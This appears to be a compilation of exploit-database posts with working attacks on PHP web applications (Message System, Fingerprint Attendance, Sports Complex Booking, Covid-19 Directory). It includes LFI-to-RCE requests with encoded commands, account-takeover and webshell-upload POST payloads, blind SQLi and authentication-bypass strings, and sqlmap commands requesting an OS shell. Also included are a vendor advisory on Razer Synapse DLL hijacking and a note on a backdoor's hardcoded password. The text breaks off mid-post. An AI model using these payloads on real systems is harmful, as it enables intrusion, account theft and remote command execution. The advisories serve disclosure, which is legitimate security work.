<pre><code># Title: Message System 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 29.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />```<br />require_once('config.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'registration';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />```<br /><br />[+] Payload GET<br /><br /><br />```<br />GET /pmms/registration?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Content-Length: 354<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br /><br />Hegap Zairy 0day Volume in drive C is OS<br />Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\<br /><br />03/18/2022 10:27 AM <DIR> Program Files<br />03/21/2022 01:45 PM <DIR> Program Files (x86)<br />03/02/2022 11:04 PM <DIR> Python27<br />03/26/2022 08:33 PM <DIR> Temp<br />03/26/2022 08:45 PM <DIR> Users<br /><br />```<br /><br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/jTqaEXn.png<br /></code></pre>
<pre>
<code># Title: Fingerprint Attendance 1.0 Account Takeover
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/
# Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
Fingerprint Attendance is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters
#Steps to Reproduce
1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.
2. Go to /fingerprint/src/ and Log in to the user account by changed username and password
#vulnerability Code php
```
<?php
echo "document.getElementById('fname').value = '".$qry["first_name"]."';";
echo "document.getElementById('lname').value = '".$qry["last_name"]."';";
echo "document.getElementById('NRIC').value = '".$qry["NRIC"]."';";
echo "document.getElementById('email').value = '".$qry["email"]."';";
echo "document.getElementById('contact').value = '".$qry["mobile"]."';";
echo "document.getElementById('contact2').value = '".$qry["mobile2"]."';";
echo "document.getElementById('line1').value = '".$qry["password"]."';";
echo "document.getElementById('line2').value = '".$qry["line1"]."';";
echo "document.getElementById('line3').value = '".$qry["line2"]."';";
echo "document.getElementById('city').value = '".$qry["city"]."';";
echo "document.getElementById('zip').value = '".$qry["zip"]."';";
echo "document.getElementById('country').value = '".$qry["country"]."';";
echo "document.getElementById('bankName').value = '".$qry["bankName"]."';";
echo "document.getElementById('bankDetail').value = '".$qry["bankDetail"]."';";
echo "document.getElementById('job').value = '".$qry["jobTitle"]."';";
?>
```
# Description:
Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information
[+] Payload POST
```
POST /fingerprint/src/register.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116
Content-Length: 2446
Origin: http://0day.gov
Connection: close
Referer: http://0day.gov/fingerprint/src/register.php
Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q
Upgrade-Insecure-Requests: 1
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="fname"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="lname"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="NRIC"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="emailaddress"
[email protected]
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="contact2"
admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="password"
admin12345
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line2"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="line3"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="city"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="zip"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="country"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankName"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="bankDetail"
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="job"
Admin
-----------------------------3324626841792192532944123116
Content-Disposition: form-data; name="button"
Register
-----------------------------3324626841792192532944123116--
```
</code></pre>
<pre><code># Title: Fingerprint Attendance 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/<br /># Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.jpg files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload NRIC files<br /><br />```<br /><?php<br /><br />$namae = $_POST["NRIC"]; // this will be nric<br />$target_dir = "photo/";<br />$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);<br />$uploadOk = 1;<br />$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));<br />// Check if image file is a actual image or fake image<br />if(isset($_POST["submit"])) {<br /> $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);<br /> if($check !== false) {<br /> //echo "File is an image - " . $check["mime"] . ".";<br /> $uploadOk = 1;<br /> } else {<br /> // echo "File is not an image.";<br /> $uploadOk = 0;<br /> }<br />}<br />```<br /><br /><br />[+] Payload POST<br /><br />```<br />POST /fingerprint/src/register.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116<br />Content-Length: 2446<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/fingerprint/src/register.php<br />Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="fname"<br />Admin<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="lname"<br /><br />admin<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="NRIC"<br />Admin<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="emailaddress"<br />Admin@gmail.com<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="contact"<br /><br />admin<br /><br />-----------------------------3324626841792192532944123116<br /><br />Content-Disposition: form-data; name="contact2"<br />admin<br />-----------------------------3324626841792192532944123116<br /><br />Content-Disposition: form-data; name="line1"<br /><br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="line2"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="line3"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="city"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="zip"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="country"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="bankName"<br />Admin<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="bankDetail"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="job"<br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="fileToUpload"; filename="0day_hejap.png.php"<br />Content-Type: image/jpg<br /><br /><?=`$_GET[515]`?><br /><br /><br />-----------------------------3324626841792192532944123116<br />Content-Disposition: form-data; name="button"<br />Register<br />-----------------------------3324626841792192532944123116--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /fingerprint/src/photo/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 29 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/A3BlWTF.png<br /><br /></code></pre>
<pre><code># Title: Fingerprint Attendance 1.0 Blind boolean SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/<br /># Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov/fingerprint/login.php<br /># 2 - manual inject Blind SQli Payload: username=hejap' OR NOT 8425=8425#&password=hejap&button=Login<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br />#vulnerability Code php<br /><br />---<br />```<br />$user = $_POST['username'];<br />$pass = sha1($_POST['password']);<br />$passwrong = false;<br /><br /> if(isSet($_POST["button"])) <br /> switch($_POST["button"]){<br /> case "Login" : <br /> $passwrong = login($con, $user, $pass); //echo "Login";<br /> break;<br /> } // ----------------- Inside if(isSet($_POST["button"]))----------------<br /><br />```<br />---<br />#Status: CRITICAL<br />[+] Payload GET<br /><br />---<br /><br />POST /fingerprint/src/ HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 61<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/fingerprint/src/<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br /><br />username=hejap'+OR+NOT+8425=8425#&password=hejap&button=Login<br />---<br /><br />```<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)<br /> Payload: username=hejap' OR NOT 8425=8425#&password=hejap&button=Login<br />---<br /><br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -r 0day_Hejap.txt -p username <br />' --hex --dbms=mysql --technique=b --random-agent --eta -D ad_39 -T login --dump --os-shell --priv-esc --forms --eta <br /># Description:<br />The Blind boolean SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/uYBA1C3.png<br />https://i.imgur.com/nQFdjNu.png<br /></code></pre>
<pre><code># Title: Sports Complex Booking System 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />php```<br />----<br /><?php $page = isset($_GET['p']) ? $_GET['p'] : 'home'; ?><br /><?php require_once('inc/topBarNav.php') ?><br /> <?php if($_settings->chk_flashdata('success')): ?><br /> <script><br /> alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')<br /> </script><br />----<br />```<br /><br /><br />[+] Payload GET<br /><br /><br />```<br />GET /scbs/?p=../../../0day&515=%64%69%72%20%43%3a%5c HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />#Status: CRITICAL<br /><br /><br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Sun, 28 Mar 2022 08:05:28 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 17<br />Connection: close<br />Content-Type: text/html; charset=UTF-8`<br /></script> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\<br /><br />03/26/2022 08:51 PM <DIR> 0day<br />03/26/2022 02:12 PM 19 0day.php<br />03/17/2022 06:06 AM 12,288 DumpStack.log<br />03/24/2022 07:14 PM <DIR> Intel<br />10/31/2021 12:47 AM <DIR> MinGW<br />10/31/2021 12:58 AM <DIR> mingw32<br />05/12/2018 08:20 PM <DIR> mingw64<br />10/31/2021 12:47 AM <DIR> msys64<br />01/02/2022 09:28 AM <DIR> pen<br />06/05/2021 03:10 PM <DIR> PerfLogs<br />03/18/2022 10:27 AM <DIR> Program Files<br />03/21/2022 01:45 PM <DIR> Program Files (x86)<br />03/02/2022 11:04 PM <DIR> Python27<br />01/30/2022 02:34 PM 474 t.txt<br />03/26/2022 08:33 PM <DIR> Temp<br />03/26/2022 08:45 PM <DIR> Users<br />```<br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/tUWZM0X.png<br />https://i.imgur.com/vrPCGTp.png<br />https://i.imgur.com/sMyZder.png<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2021-058<br />Product: Razer Synapse<br />Manufacturer: Razer Inc.<br />Affected Version(s): Versions prior to 3.7.0228.022817<br />Tested Version(s): 3.6.0920.091710, 3.6.1010.101113, <br />3.6.1018.101823,<br /> 3.6.1130.111217, 3.6.1201.111814, <br />3.7.0131.011810<br />Vulnerability Type: Improper Privilege Management (CWE-269)<br />Risk Level: Critical<br />Solution Status: Fixed<br />Manufacturer Notification: 2021-10-18<br />Solution Date: 2022-03-07<br />Public Disclosure: 2022-03-23<br />CVE Reference: CVE-2021-44226<br />Authors of Advisory: Dr. Oliver Schwarz, SySS GmbH<br /> Matthias Deeg, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Razer Synapse is an additional driver software for Razer gaming devices.<br />The manufacturer describes the product as a "unified cloud-based hardware<br />configuration tool" (see [1]).<br /><br />Due to an unsafe installation path and improper privilege management,<br />the associated system service "Razer Synapse Service" is vulnerable to<br />DLL hijacking.<br />As a result, local Windows users can abuse the Razer driver installer to<br />obtain administrative privileges on Windows.<br /><br />In order to exploit the vulnerability, the attacker needs physical<br />access to the machine and needs to prepare the attack before Razer<br />Synapse is installed along with a Razer driver.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The attack scenario considers a Windows machine without any previous<br />installation of any Razer device or software.<br />The attacker has a local unprivileged Windows account, physical access<br />to the machine, and a device which is either a Razer peripheral or able<br />to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).<br />The attacker aims at executing code with full system privileges.<br /><br />The attack exploits the Razer Synapse Service which runs with elevated<br />privileges. While the main binary of the service is stored in the<br />protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it<br />dynamically loads libraries from<br />"C:\ProgramData\Razer\Synapse3\Service\bin".<br />Before the installation, standard users can write to this path, since<br />"C:\ProgramData" is world-writable on a standard installation of Windows.<br /><br />The Synapse installation procedure changes access privileges, so that<br />standard users cannot write to the path any longer. In addition, it<br />removes any previous files in that location.<br />Furthermore, upon service start, the location is checked for DLLs that<br />do not originate from Razer.<br /><br />However, if the path is created before the driver installation, the<br />creator remains owner of the object and can still change directory and<br />file permissions. In particular, the creator can deny access for the<br />SYSTEM user and grant access for the attacker's user.<br /><br />The attack consists of three phases:<br /><br />1. Before the installation of the driver/Synapse, the attacker creates<br /> "C:\ProgramData\Razer\Synapse3\Service" and denies write-access for<br /> SYSTEM.<br /><br />2. Afterwards, the attacker triggers the installation of Synapse.<br /> This can be done without any elevated privileges by plugging in a<br /> Razer device and following the installation procedure for Synapse,<br /> if device-specific co-installers are not disabled.<br /> Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero<br /> can be used and pretend to be a Razer device.<br /><br />3. After the installation of Synapse has finished, the attacker grants<br /> full access to "C:\ProgramData\Razer\Synapse3" for both the SYSTEM<br /> user and the own low-privileged user account. Afterwards, the<br /> attacker places a prepared set of DLLs into<br /> "C:\ProgramData\Razer\Synapse3\Service\bin" and restarts the Razer<br /> Synapse Service, typically, by restarting the machine.<br /><br />SySS GmbH chose the following set of DLLs for a proof of concept:<br /><br />* RzLightingEngine.dll from the original installation<br />* RSy3_LightingEffects.dll from the original installation<br />* userenv_orig.dll, a copy from the standard Windows DLL at<br /> "C:\Windows\SysWOW64\userenv.dll"<br />* userenv.dll, a malicious 32-bit DLL that creates a new admin user<br /> and redirects to userenv_orig.dll otherwise<br /><br />The attack has been successfully tested for the following versions of<br />Razer Synapse:<br /><br />* 3.6.0920.091710<br />* 3.6.1010.101113<br />* 3.6.1018.101823<br />* 3.6.1130.111217<br />* 3.6.1201.111814<br /><br />A modified version of the exploit has been successfully tested<br />against version 3.7.0131.011810.<br /><br />The attack has been successfully tested on the following versions of<br />Windows:<br /><br />* Windows 10 Enterprise 20H2 19042.1237<br />* Windows 10 Pro 20H2 19042.1237<br />* Windows 10 Pro 21H1 19043.1237<br />* Windows 10 Pro 21H1 19043.1266<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Razer has published a patched version that will be deployed automatically<br />upon driver installation on current Windows builds.<br /><br />To prevent similar attacks through other co-installers, system<br />administrators can disable them by setting the following key in the<br />Windows registry:<br /><br />HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device <br />Installer\DisableCoInstallers = 1<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2021-10-07: Vulnerability discovered<br />2021-10-11: Initial contact to Razer support<br />2021-10-18: Vulnerability reported to manufacturer<br />2022-01-18: First direct contact with developer team<br />2022-02-03: First fix attempt (3.7.0131.011810) announced to SySS GmbH<br />2022-03-07: Final fix (3.7.0228.022817) announced to SySS GmbH<br />2022-03-23: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Razer Synapse 3<br /> https://www2.razer.com/eu-en/synapse-3<br />[2] SySS Security Advisory SYSS-2021-058<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-058.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] SySS Proof of Concept Video<br /> https://www.youtube.com/watch?v=P75BtYcnZ-A<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.<br /><br />E-Mail: oliver.schwarz@syss.de<br />Public Key: <br />https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc<br />Key ID: 0x9716294F1294280D<br />Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b24c56abb4bde960c2d51d4e509d2c68_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cafeini.b<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Cafeini<br />Type: PE32<br />MD5: b24c56abb4bde960c2d51d4e509d2c68<br />Vuln ID: MVID-2022-0526<br />Disclosure: 03/25/2022<br />Description: The malware listens on TCP port 51966. Authentication is required, however the password "speedfire" is weak and hardcoded in the PE file.<br /><br />Commands:<br />REGISTRYTOOLS or RT <ON/OFF> - access to REGEDIT.EXE<br />REGISTRYTOOLS lub RT <ON/OFF> - dostep do programu REGEDIT.EXE<br />TELNET <NAME> [PORT] - telnet to remote computer NAME on port PORT (default 23)<br />KILL <NAME> or <PID> - kills process NAME or PID (both from command PS)<br />DIR or LS [PATH] - shows files in current directory<br />DEL or ERASE or RM <PATH> - removes file PATH<br />COPY or CP <PATH1> <PATH2> - copies file from PATH1 to PATH2<br />CMD or SYSTEM or SYS <CMND> - returns results of system command (by COMMAND.COM)<br />TELNET <NAZWA> [PORT] - telnetuje na adres NAZWA na porcie PORT (domyslnie 23)<br />KILL <NAZWA> lub <PID> - zabij proces o nazwie NAZWA lub PID (uzyskany przez PS)<br />DIR lub LS [SCIEZKA] - wyswietla katalog<br />DEL lub ERASE,RM <SCIEZKA>- skasowanie pliku SCIEZK<br />COPY lub CP <SCIEZKA1> <SCIEZKA2> - kopiuje plik z SCIEZKA1 na SCIEZKA2<br />CMD lub SYS <KOMENDA> - wypisz wynik komendy systemowej (przez COMMAND.COM)<br />SHUTDOWN - turn off computer<br />OPEN <NAME> - opens file NAME with default program (eg. MP3 with WinAmp)<br />SHUTDOWN - zresetuj (lub wylacz) komputer<br />OPEN <NAZWA> - otwiera plik domyslnie ustawionym programem np. MP3 WinAmpem<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 51966<br /> CAFEiNi 1.1<br />Enter your password:<br />speedfire<br />[32mC:\Users\Victim\Desktop>[37mexec c:\windows\system32\calc.exe<br />exec c:\windows\system32\calc.exe<br />STATUS: program runned<br />[32mC:\Users\Victim\Desktop>[37m<br />[32mC:\Users\Victim\Desktop>[37mcd \Windows<br />[32mC:\Windows>[37mSHUTDOWN<br />SHUTDOWN<br />STATUS: I'm going to shutdown computer<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Title: Covid-19 Directory on Vaccination System 1.0 Blind boolean SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : http://0day.gov//covid-19/hospital.php?cmdcategory=1 <br /># 2 - manual inject Blind SQli https://0day.gov/covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br />#vulnerability Code php<br /><br />---<br />```php<br /> $category = $_GET['cmdcategory'];<br /> // $conn = new mysqli ($servername, $username, $password, $dbname) or die("Connection to Database Failed");<br /> $stmt = $conn->stmt_init();<br /> $sql = "SELECT vaccination_center FROM hospital WHERE category_id = (select id_no from category where category like '$category%')";<br /> $stmt->prepare($sql);<br /> $stmt->execute();<br /> $result = $stmt->get_result();<br /> while($resultRow = $result->fetch_array(MYSQLI_NUM))<br /> echo "<option>$resultRow[0]</option>";<br /> $result->close();<br /> $stmt->close();<br />```<br />---<br />#Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br />Te: trailers<br />Connection: close<br />---<br /><br />```<br />---<br />Parameter: cmdcategory (GET)<br /> Type: boolean-based blind<br /> Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br /> Payload: cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hJWj%'='hJWj<br /><br />---<br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -u http://0day.gov/covid-19/hospital.php?cmdcategory=1" -p cmdcategory <br />' --hex --time-sec=10 --dbms=mysql --technique=b --random-agent --eta -D covid19 -T admin --dump --os-shell --priv-esc <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/xeWSc7B.png<br />https://i.imgur.com/XiVBeYa.png<br /><br /><br />----------------------------------<br /><br /><br /># Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass<br /># Author: Hejap Zairy<br /># Date: 28.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov/covid-19/admin/login.php<br /># 2 - SQLi Authentication Bypass [admin'or 1=1 or ''=']<br /><br />#vulnerability Code php<br /><br />---<br />```php<br />if(isset($_POST['btnlogin']))<br />{<br />$username = $_POST['txtusername'];<br />$password = $_POST['txtpassword'];<br />$status = 'Active';<br /> $sql = "SELECT * FROM admin WHERE username='" .$username. "' and password = '".$password."' and status = '".$status."' ";<br /><br />```<br />---<br />#Status: CRITICAL<br />[+] Payload POST<br /><br />---<br 